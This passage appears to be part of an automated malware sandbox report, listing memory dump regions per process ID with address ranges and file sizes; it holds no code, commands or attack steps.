                    • memory/852-628-0x0000000000000000-mapping.dmp
                    • memory/852-636-0x0000000000120000-0x0000000000121000-memory.dmp
                      Filesize

                      4KB

                    • memory/852-639-0x0000000000000000-mapping.dmp
                    • memory/852-629-0x0000000000150000-0x0000000000151000-memory.dmp
                      Filesize

                      4KB

                    • memory/852-630-0x0000000000000000-mapping.dmp
                    • memory/852-632-0x0000000000000000-mapping.dmp
                    • memory/964-28-0x0000000000000000-mapping.dmp
                    • memory/1080-0-0x0000000000000000-mapping.dmp
                    • memory/1128-26-0x0000000000000000-mapping.dmp
                    • memory/1284-43-0x0000000004A90000-0x0000000004A91000-memory.dmp
                      Filesize

                      4KB

                    • memory/1284-33-0x0000000070CC0000-0x00000000713AE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1284-20-0x0000000000000000-mapping.dmp
                    • memory/1360-8-0x0000000000000000-mapping.dmp
                    • memory/1376-622-0x0000000050480000-0x000000005049A000-memory.dmp
                      Filesize

                      104KB

                    • memory/1376-325-0x0000000000000000-mapping.dmp
                    • memory/1376-635-0x0000000010530000-0x000000001054A000-memory.dmp
                      Filesize

                      104KB

                    • memory/1376-380-0x0000000002F80000-0x0000000002FCC000-memory.dmp
                      Filesize

                      304KB

                    • memory/1392-359-0x0000000000000000-mapping.dmp
                    • memory/1392-361-0x00000000729B0000-0x000000007309E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1392-362-0x00000000020E0000-0x00000000020E1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1392-363-0x00000000048F0000-0x00000000048F1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1392-364-0x0000000002780000-0x0000000002781000-memory.dmp
                      Filesize

                      4KB

                    • memory/1392-365-0x0000000005420000-0x0000000005421000-memory.dmp
                      Filesize

                      4KB

                    • memory/1408-49-0x0000000002800000-0x0000000002801000-memory.dmp
                      Filesize

                      4KB

                    • memory/1408-36-0x0000000070CC0000-0x00000000713AE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1408-37-0x0000000002560000-0x0000000002561000-memory.dmp
                      Filesize

                      4KB

                    • memory/1408-29-0x0000000000000000-mapping.dmp
                    • memory/1464-170-0x0000000006490000-0x0000000006491000-memory.dmp
                      Filesize

                      4KB

                    • memory/1464-35-0x0000000070CC0000-0x00000000713AE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1464-30-0x0000000000000000-mapping.dmp
                    • memory/1488-4-0x0000000000000000-mapping.dmp
                    • memory/1488-5-0x0000000000000000-mapping.dmp
                    • memory/1604-55-0x0000000005480000-0x0000000005481000-memory.dmp
                      Filesize

                      4KB

                    • memory/1604-23-0x0000000070CC0000-0x00000000713AE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1604-12-0x0000000000000000-mapping.dmp
                    • memory/1628-13-0x0000000000000000-mapping.dmp
                    • memory/1628-22-0x0000000070CC0000-0x00000000713AE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1684-284-0x0000000000400000-0x0000000000434000-memory.dmp
                      Filesize

                      208KB

                    • memory/1684-281-0x0000000000417A8B-mapping.dmp
                    • memory/1684-279-0x0000000000400000-0x0000000000434000-memory.dmp
                      Filesize

                      208KB

                    • memory/1760-318-0x0000000000000000-mapping.dmp
                    • memory/1760-321-0x00000000729B0000-0x000000007309E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1760-322-0x00000000012C0000-0x00000000012C1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1760-369-0x0000000000A80000-0x0000000000AA3000-memory.dmp
                      Filesize

                      140KB

                    • memory/1760-371-0x0000000000AF0000-0x0000000000B14000-memory.dmp
                      Filesize

                      144KB

                    • memory/1788-236-0x0000000000400000-0x0000000000493000-memory.dmp
                      Filesize

                      588KB

                    • memory/1788-232-0x000000000043FCC3-mapping.dmp
                    • memory/1788-228-0x0000000000400000-0x0000000000493000-memory.dmp
                      Filesize

                      588KB

                    • memory/1796-234-0x0000000070CC0000-0x00000000713AE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1796-240-0x00000000003F0000-0x00000000003F1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1796-269-0x0000000000900000-0x0000000000951000-memory.dmp
                      Filesize

                      324KB

                    • memory/1796-231-0x0000000000000000-mapping.dmp
                    • memory/1796-238-0x00000000000F0000-0x00000000000F1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1816-637-0x0000000000000000-mapping.dmp
                    • memory/1828-10-0x0000000000000000-mapping.dmp
                    • memory/1840-11-0x0000000000000000-mapping.dmp
                    • memory/1904-15-0x0000000000000000-mapping.dmp
                    • memory/1944-300-0x0000000000000000-mapping.dmp
                    • memory/1964-626-0x0000000000000000-mapping.dmp
                    • memory/1976-17-0x0000000000000000-mapping.dmp
                    • memory/1996-19-0x0000000000000000-mapping.dmp
                    • memory/2028-102-0x00000000066F0000-0x00000000066F1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2028-21-0x0000000000000000-mapping.dmp
                    • memory/2028-76-0x0000000006510000-0x0000000006511000-memory.dmp
                      Filesize

                      4KB

                    • memory/2028-82-0x0000000006540000-0x0000000006541000-memory.dmp
                      Filesize

                      4KB

                    • memory/2028-68-0x0000000005970000-0x0000000005971000-memory.dmp
                      Filesize

                      4KB

                    • memory/2028-69-0x00000000063D0000-0x00000000063D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2028-132-0x00000000067D0000-0x00000000067D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2028-135-0x00000000067E0000-0x00000000067E1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2028-34-0x0000000070CC0000-0x00000000713AE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2028-63-0x0000000005920000-0x0000000005921000-memory.dmp
                      Filesize

                      4KB

                    • memory/2076-267-0x0000000000000000-mapping.dmp
                    • memory/2116-268-0x0000000000000000-mapping.dmp
                    • memory/2184-282-0x0000000000000000-mapping.dmp
                    • memory/2184-289-0x0000000000F20000-0x0000000000F21000-memory.dmp
                      Filesize

                      4KB

                    • memory/2184-310-0x0000000000610000-0x0000000000634000-memory.dmp
                      Filesize

                      144KB

                    • memory/2184-291-0x00000000003B0000-0x00000000003B1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2184-287-0x0000000070CC0000-0x00000000713AE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2212-345-0x0000000000250000-0x0000000000262000-memory.dmp
                      Filesize

                      72KB

                    • memory/2212-331-0x00000000729B0000-0x000000007309E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2212-354-0x0000000004C90000-0x0000000004C92000-memory.dmp
                      Filesize

                      8KB

                    • memory/2212-328-0x0000000000000000-mapping.dmp
                    • memory/2212-349-0x0000000000500000-0x0000000000510000-memory.dmp
                      Filesize

                      64KB

                    • memory/2212-348-0x0000000004C90000-0x0000000004C92000-memory.dmp
                      Filesize

                      8KB

                    • memory/2212-338-0x0000000000CF0000-0x0000000000CF1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2212-347-0x00000000005F0000-0x00000000005F5000-memory.dmp
                      Filesize

                      20KB

                    • memory/2212-344-0x00000000001C0000-0x00000000001C1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2292-376-0x00000000049E0000-0x00000000049E1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2292-375-0x00000000024E0000-0x00000000024E1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2292-378-0x0000000004950000-0x0000000004951000-memory.dmp
                      Filesize

                      4KB

                    • memory/2292-377-0x00000000025D0000-0x00000000025D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2292-374-0x00000000729B0000-0x000000007309E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2292-370-0x0000000000000000-mapping.dmp
                    • memory/2332-314-0x000000000041A684-mapping.dmp
                    • memory/2332-313-0x0000000000400000-0x0000000000420000-memory.dmp
                      Filesize

                      128KB

                    • memory/2332-316-0x0000000000400000-0x0000000000420000-memory.dmp
                      Filesize

                      128KB

                    • memory/2396-299-0x0000000000000000-mapping.dmp
                    • memory/2472-634-0x0000000000000000-mapping.dmp
                    • memory/2532-226-0x0000000000CA0000-0x0000000000CAD000-memory.dmp
                      Filesize

                      52KB

                    • memory/2532-127-0x0000000000CE0000-0x0000000000CE1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2532-116-0x0000000070CC0000-0x00000000713AE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2532-112-0x0000000000000000-mapping.dmp
                    • memory/2532-214-0x0000000004B60000-0x0000000004C10000-memory.dmp
                      Filesize

                      704KB

                    • memory/2580-122-0x0000000000000000-mapping.dmp
                    • memory/2604-346-0x0000000000310000-0x0000000000321000-memory.dmp
                      Filesize

                      68KB

                    • memory/2604-342-0x00000000002B0000-0x00000000002B1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2604-339-0x00000000002D0000-0x00000000002D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2604-337-0x00000000729B0000-0x000000007309E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2604-333-0x0000000000000000-mapping.dmp
                    • memory/2604-358-0x0000000000460000-0x0000000000470000-memory.dmp
                      Filesize

                      64KB

                    • memory/2604-355-0x0000000000330000-0x0000000000333000-memory.dmp
                      Filesize

                      12KB

                    • memory/2616-638-0x0000000000000000-mapping.dmp
                    • memory/2624-334-0x0000000000000000-mapping.dmp
                    • memory/2628-237-0x0000000002810000-0x0000000002814000-memory.dmp
                      Filesize

                      16KB

                    • memory/2628-225-0x0000000000000000-mapping.dmp
                    • memory/2636-134-0x0000000000000000-mapping.dmp
                    • memory/2704-142-0x0000000000000000-mapping.dmp
                    • memory/2740-201-0x000007FEF6780000-0x000007FEF69FA000-memory.dmp
                      Filesize

                      2.5MB

                    • memory/2748-147-0x0000000000000000-mapping.dmp
                    • memory/2772-151-0x0000000000000000-mapping.dmp
                    • memory/2784-265-0x0000000000000000-mapping.dmp
                    • memory/2808-157-0x0000000000000000-mapping.dmp
                    • memory/2808-272-0x0000000000000000-mapping.dmp
                    • memory/2808-286-0x00000000026E0000-0x00000000026E4000-memory.dmp
                      Filesize

                      16KB

                    • memory/2828-164-0x000000000043FCC3-mapping.dmp
                    • memory/2828-162-0x0000000000400000-0x0000000000498000-memory.dmp
                      Filesize

                      608KB

                    • memory/2828-168-0x0000000000400000-0x0000000000498000-memory.dmp
                      Filesize

                      608KB

                    • memory/2884-181-0x0000000000400000-0x0000000000439000-memory.dmp
                      Filesize

                      228KB

                    • memory/2884-173-0x0000000000400000-0x0000000000439000-memory.dmp
                      Filesize

                      228KB

                    • memory/2884-176-0x0000000000417A8B-mapping.dmp
                    • memory/2900-187-0x0000000000400000-0x0000000000425000-memory.dmp
                      Filesize

                      148KB

                    • memory/2900-177-0x000000000041A684-mapping.dmp
                    • memory/2900-175-0x0000000000400000-0x0000000000425000-memory.dmp
                      Filesize

                      148KB

                    • memory/2948-189-0x000000000043FCC3-mapping.dmp
                    • memory/2968-513-0x0000000000000000-mapping.dmp
                    • memory/2968-507-0x0000000000000000-mapping.dmp
                    • memory/2968-399-0x0000000000000000-mapping.dmp
                    • memory/2968-401-0x0000000000000000-mapping.dmp
                    • memory/2968-403-0x0000000000000000-mapping.dmp
                    • memory/2968-405-0x0000000000000000-mapping.dmp
                    • memory/2968-407-0x0000000000000000-mapping.dmp
                    • memory/2968-409-0x0000000000000000-mapping.dmp
                    • memory/2968-411-0x0000000000000000-mapping.dmp
                    • memory/2968-413-0x0000000000000000-mapping.dmp
                    • memory/2968-415-0x0000000000000000-mapping.dmp
                    • memory/2968-417-0x0000000000000000-mapping.dmp
                    • memory/2968-419-0x0000000000000000-mapping.dmp
                    • memory/2968-421-0x0000000000000000-mapping.dmp
                    • memory/2968-423-0x0000000000000000-mapping.dmp
                    • memory/2968-425-0x0000000000000000-mapping.dmp
                    • memory/2968-427-0x0000000000000000-mapping.dmp
                    • memory/2968-429-0x0000000000000000-mapping.dmp
                    • memory/2968-431-0x0000000000000000-mapping.dmp
                    • memory/2968-433-0x0000000000000000-mapping.dmp
                    • memory/2968-435-0x0000000000000000-mapping.dmp
                    • memory/2968-523-0x0000000000000000-mapping.dmp
                    • memory/2968-439-0x0000000000000000-mapping.dmp
                    • memory/2968-441-0x0000000000000000-mapping.dmp
                    • memory/2968-443-0x0000000000000000-mapping.dmp
                    • memory/2968-445-0x0000000000000000-mapping.dmp
                    • memory/2968-447-0x0000000000000000-mapping.dmp
                    • memory/2968-449-0x0000000000000000-mapping.dmp
                    • memory/2968-451-0x0000000000000000-mapping.dmp
                    • memory/2968-453-0x0000000000000000-mapping.dmp
                    • memory/2968-455-0x0000000000000000-mapping.dmp
                    • memory/2968-457-0x0000000000000000-mapping.dmp
                    • memory/2968-459-0x0000000000000000-mapping.dmp
                    • memory/2968-461-0x0000000000000000-mapping.dmp
                    • memory/2968-463-0x0000000000000000-mapping.dmp
                    • memory/2968-465-0x0000000000000000-mapping.dmp
                    • memory/2968-467-0x0000000000000000-mapping.dmp
                    • memory/2968-469-0x0000000000000000-mapping.dmp
                    • memory/2968-471-0x0000000000000000-mapping.dmp
                    • memory/2968-473-0x0000000000000000-mapping.dmp
                    • memory/2968-475-0x0000000000000000-mapping.dmp
                    • memory/2968-477-0x0000000000000000-mapping.dmp
                    • memory/2968-479-0x0000000000000000-mapping.dmp
                    • memory/2968-481-0x0000000000000000-mapping.dmp
                    • memory/2968-483-0x0000000000000000-mapping.dmp
                    • memory/2968-485-0x0000000000000000-mapping.dmp
                    • memory/2968-487-0x0000000000000000-mapping.dmp
                    • memory/2968-489-0x0000000000000000-mapping.dmp
                    • memory/2968-491-0x0000000000000000-mapping.dmp
                    • memory/2968-493-0x0000000000000000-mapping.dmp
                    • memory/2968-495-0x0000000000000000-mapping.dmp
                    • memory/2968-497-0x0000000000000000-mapping.dmp
                    • memory/2968-499-0x0000000000000000-mapping.dmp
                    • memory/2968-501-0x0000000000000000-mapping.dmp
                    • memory/2968-503-0x0000000000000000-mapping.dmp
                    • memory/2968-505-0x0000000000000000-mapping.dmp
                    • memory/2968-521-0x0000000000000000-mapping.dmp
                    • memory/2968-509-0x0000000000000000-mapping.dmp
                    • memory/2968-511-0x0000000000000000-mapping.dmp
                    • memory/2968-395-0x0000000000000000-mapping.dmp
                    • memory/2968-515-0x0000000000000000-mapping.dmp
                    • memory/2968-517-0x0000000000000000-mapping.dmp
                    • memory/2968-575-0x0000000000000000-mapping.dmp
                    • memory/2968-397-0x0000000000000000-mapping.dmp
                    • memory/2968-437-0x0000000000000000-mapping.dmp
                    • memory/2968-525-0x0000000000000000-mapping.dmp
                    • memory/2968-527-0x0000000000000000-mapping.dmp
                    • memory/2968-529-0x0000000000000000-mapping.dmp
                    • memory/2968-531-0x0000000000000000-mapping.dmp
                    • memory/2968-533-0x0000000000000000-mapping.dmp
                    • memory/2968-535-0x0000000000000000-mapping.dmp
                    • memory/2968-537-0x0000000000000000-mapping.dmp
                    • memory/2968-539-0x0000000000000000-mapping.dmp
                    • memory/2968-541-0x0000000000000000-mapping.dmp
                    • memory/2968-543-0x0000000000000000-mapping.dmp
                    • memory/2968-545-0x0000000000000000-mapping.dmp
                    • memory/2968-547-0x0000000000000000-mapping.dmp
                    • memory/2968-549-0x0000000000000000-mapping.dmp
                    • memory/2968-551-0x0000000000000000-mapping.dmp
                    • memory/2968-553-0x0000000000000000-mapping.dmp
                    • memory/2968-555-0x0000000000000000-mapping.dmp
                    • memory/2968-557-0x0000000000000000-mapping.dmp
                    • memory/2968-559-0x0000000000000000-mapping.dmp
                    • memory/2968-561-0x0000000000000000-mapping.dmp
                    • memory/2968-563-0x0000000000000000-mapping.dmp
                    • memory/2968-565-0x0000000000000000-mapping.dmp
                    • memory/2968-567-0x0000000000000000-mapping.dmp
                    • memory/2968-569-0x0000000000000000-mapping.dmp
                    • memory/2968-571-0x0000000000000000-mapping.dmp
                    • memory/2968-573-0x0000000000000000-mapping.dmp
                    • memory/2968-519-0x0000000000000000-mapping.dmp
                    • memory/2968-577-0x0000000000000000-mapping.dmp
                    • memory/2968-579-0x0000000000000000-mapping.dmp
                    • memory/2968-581-0x0000000000000000-mapping.dmp
                    • memory/2968-583-0x0000000000000000-mapping.dmp
                    • memory/2968-585-0x0000000000000000-mapping.dmp
                    • memory/2968-587-0x0000000000000000-mapping.dmp
                    • memory/2968-589-0x0000000000000000-mapping.dmp
                    • memory/2968-591-0x0000000000000000-mapping.dmp
                    • memory/2968-593-0x0000000000000000-mapping.dmp
                    • memory/2968-595-0x0000000000000000-mapping.dmp
                    • memory/2968-597-0x0000000000000000-mapping.dmp
                    • memory/2968-599-0x0000000000000000-mapping.dmp
                    • memory/2968-601-0x0000000000000000-mapping.dmp
                    • memory/2968-603-0x0000000000000000-mapping.dmp
                    • memory/2968-605-0x0000000000000000-mapping.dmp
                    • memory/2968-607-0x0000000000000000-mapping.dmp
                    • memory/2968-609-0x0000000000000000-mapping.dmp
                    • memory/2968-611-0x0000000000000000-mapping.dmp
                    • memory/2968-613-0x0000000000000000-mapping.dmp
                    • memory/2968-615-0x0000000000000000-mapping.dmp
                    • memory/2968-617-0x0000000000000000-mapping.dmp
                    • memory/2968-619-0x0000000000000000-mapping.dmp
                    • memory/2968-621-0x0000000000000000-mapping.dmp
                    • memory/2968-384-0x00000000000E0000-0x00000000000E1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2968-623-0x0000000003C80000-0x0000000003C81000-memory.dmp
                      Filesize

                      4KB

                    • memory/2968-624-0x0000000000000000-mapping.dmp
                    • memory/2968-393-0x0000000000000000-mapping.dmp
                    • memory/2968-391-0x0000000000000000-mapping.dmp
                    • memory/2968-389-0x0000000000000000-mapping.dmp
                    • memory/2968-387-0x0000000000000000-mapping.dmp
                    • memory/2968-385-0x0000000000000000-mapping.dmp
                    • memory/2968-383-0x0000000000000000-mapping.dmp
                    • memory/2968-382-0x00000000000A0000-0x00000000000A1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2980-266-0x0000000000000000-mapping.dmp
                    • memory/2996-194-0x000000000041A684-mapping.dmp
                    • memory/3032-198-0x0000000000417A8B-mapping.dmp